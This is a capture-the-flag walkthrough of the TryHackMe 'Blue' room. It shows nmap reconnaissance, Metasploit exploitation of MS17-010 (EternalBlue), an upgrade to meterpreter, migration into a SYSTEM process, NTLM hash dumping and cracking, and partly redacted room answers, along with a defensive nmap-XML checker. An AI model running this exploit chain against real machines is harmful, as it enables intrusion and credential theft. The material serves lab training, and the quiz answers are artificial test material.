TryHackMe - Blue

Deploy & hack into a Windows machine, leveraging common misconfiguration issues.

Intro

The next room in TryHackMe’s OSCP path. Make sure to check out TryHackMe!


Blue Writeup

[Task 1] Recon

First, I ran an nmap scan on the box with the command nmap -A -sC -sV <IP>. The -A flag turns on OS detection, version detection, default script scanning and traceroute (so -sC and -sV are already implied by it), giving a more aggressive scan with more information.

The scan reveals 9 open ports, but only 3 of them have port numbers below 1000. Looking at the scan, we see SMB running. This, along with the fact that one of the tags for the box is “eternalblue”, makes me think that this box could be vulnerable to EternalBlue. EternalBlue is an exploit developed by the NSA and leaked by the Shadow Brokers hacker group; it abuses a vulnerability in how Microsoft implemented SMB.

To see if the box is actually vulnerable to EternalBlue, I ran the nmap scan again with the additional argument --script safe, which has nmap run its safe-category NSE scripts (including the SMB vulnerability checks) against the box.

The relevant information from the second nmap scan is shown above. From this, we can see that the box is indeed vulnerable to EternalBlue, tracked by Microsoft as ms17-010.
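As an added example (not code from the original writeup), here is a small Python checker in a defender's inventory role: it parses nmap XML output (-oX) and, per host, counts the open ports below 1000 and reads the verdict of Nmap's smb-vuln-ms17-010 script, which is the check the second scan relies on. The XML sample is constructed, and the host addresses and port set are assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed stand-in for "nmap -oX" output (not a capture from the TryHackMe box):
# host A exposes 9 open TCP ports, 3 of them below 1000, and the smb-vuln-ms17-010
# script reports VULNERABLE; host B has only SMB open and reports NOT VULNERABLE.
_PORTS_A = [135, 139, 445, 3389, 49152, 49153, 49154, 49158, 49160]

def _host_xml(addr, ports, ms17_state):
    port_xml = "".join(
        f'<port protocol="tcp" portid="{p}"><state state="open"/></port>' for p in ports)
    return (f'<host><address addr="{addr}" addrtype="ipv4"/><ports>{port_xml}'
            '<port protocol="tcp" portid="80"><state state="closed"/></port></ports>'
            f'<hostscript><script id="smb-vuln-ms17-010" output="{ms17_state}">'
            f'<table key="CVE-2017-0143"><elem key="state">{ms17_state}</elem></table>'
            '</script></hostscript></host>')

SAMPLE_NMAP_XML = ('<nmaprun scanner="nmap">'
                   + _host_xml("10.10.10.10", _PORTS_A, "VULNERABLE")
                   + _host_xml("10.10.10.11", [445], "NOT VULNERABLE") + '</nmaprun>')

def parse_nmap_hosts(xml_text):
    """Return one dict per host: address, sorted open TCP ports, ms17-010 script state."""
    hosts = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        open_ports = sorted(
            int(p.get("portid")) for p in host.iter("port")
            if p.find("state") is not None and p.find("state").get("state") == "open")
        state = None
        for script in host.iter("script"):
            if script.get("id") == "smb-vuln-ms17-010":
                # The vulns library nests the verdict in <elem key="state">; fall back to output.
                elem = script.find(".//elem[@key='state']")
                state = (elem.text or "").strip() if elem is not None else script.get("output", "")
        hosts.append({"addr": addr_el.get("addr") if addr_el is not None else "?",
                      "open_ports": open_ports, "ms17_010": state})
    return hosts

def summarize(host, low_port_limit=1000):
    """Answer the recon questions for one host and flag MS17-010 exposure."""
    state = host["ms17_010"] or ""
    # "NOT VULNERABLE" also contains the word VULNERABLE, so match on the prefix only.
    vulnerable = state.startswith(("VULNERABLE", "LIKELY VULNERABLE"))
    return {"addr": host["addr"], "open": len(host["open_ports"]),
            "open_below_limit": sum(p < low_port_limit for p in host["open_ports"]),
            "smb_exposed": 445 in host["open_ports"], "ms17_010_vulnerable": vulnerable}

if __name__ == "__main__":
    for h in parse_nmap_hosts(SAMPLE_NMAP_XML):
        print(summarize(h))
```

A host that still reports VULNERABLE after patching deserves a second look at whether SMBv1 is actually disabled, since the script probes the protocol rather than the patch level.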

Question: How many ports are open with a port number under 1000?

Answer: 3

Question: What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

Answer: ms17-010

[Task 2] Gain Access

To exploit this vulnerability, I used Metasploit. First, open up msfconsole and run the following commands to set up and run the exploit.

$ msfconsole
msf5> use exploit/windows/smb/ms17_010_eternalblue
msf5> show targets
msf5> set TARGET 0
msf5> show options
msf5> set RHOST <IP>
msf5> exploit

This will select the EternalBlue exploit from Metasploit’s list of exploits, and aim it at our target box.

Question: Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

Answer: exploit/windows/smb/ms17_010_eternalblue

Question: Show options and set the one required value. What is the name of this value? (All caps for submission)

Answer: RHOST

[Task 3] Escalate

In the terminal that has run the exploit, background the shell with CTRL+Z. Now we will upgrade that shell to a meterpreter session using the post/multi/manage/shell_to_meterpreter post module. We need to find our active session and provide its number as the SESSION option to the new module.

msf5> use post/multi/manage/shell_to_meterpreter
msf5> show options
msf5> sessions -l
msf5> set SESSION 1
msf5> exploit

Once this is done, we need to interact with our new session.

msf5> sessions -l
msf5> sessions -i 2

With this, we now have meterpreter shell access to the box! Following the next steps of the task, we list the running processes and migrate into one that is running as SYSTEM, so that our session has SYSTEM privileges.

meterpreter > ps
meterpreter > migrate 2856

If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit.

Question: What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

Answer: post/multi/manage/shell_to_meterpreter

Question: Select this (use MODULE_PATH). Show options, what option are we required to change? (All caps for answer)

Answer: SESSION

[Task 4] Cracking

Now, we need to crack some passwords. Running the command hashdump gives us the following output:

From this, we see the name of the non-default user is Jon.

Unfortunately, these aren’t plaintext passwords but NTLM hashes. However, they may still be crackable. A good program to use for this is John the Ripper, but I first wanted to check some online utilities. Going to https://crackstation.net/ and pasting in the NT hash section of Jon’s dumped hash gives me his password.

Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so.

Question: What is the name of the non-default user?

Answer: Jon

Question: Copy this password hash to a file and research how to crack it. What is the cracked password?

Answer: al...

[Task 5] Find flags!

Now that we have access, we need to find the flags.

I found the first flag by reading the flag1.txt file located in the root of the C:/ drive. I found the second flag by looking where local user account passwords are stored, which is C:\windows\system32\config. The final flag was in Jon’s Documents folder.

Question: Flag1? (Only submit the flag contents {CONTENTS})

Answer: access_...

Question: Flag2? *Errata: Windows really doesn’t like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This is relatively rare; however, it can happen.

Answer: sam_...

Question: flag3?

Answer: admin_...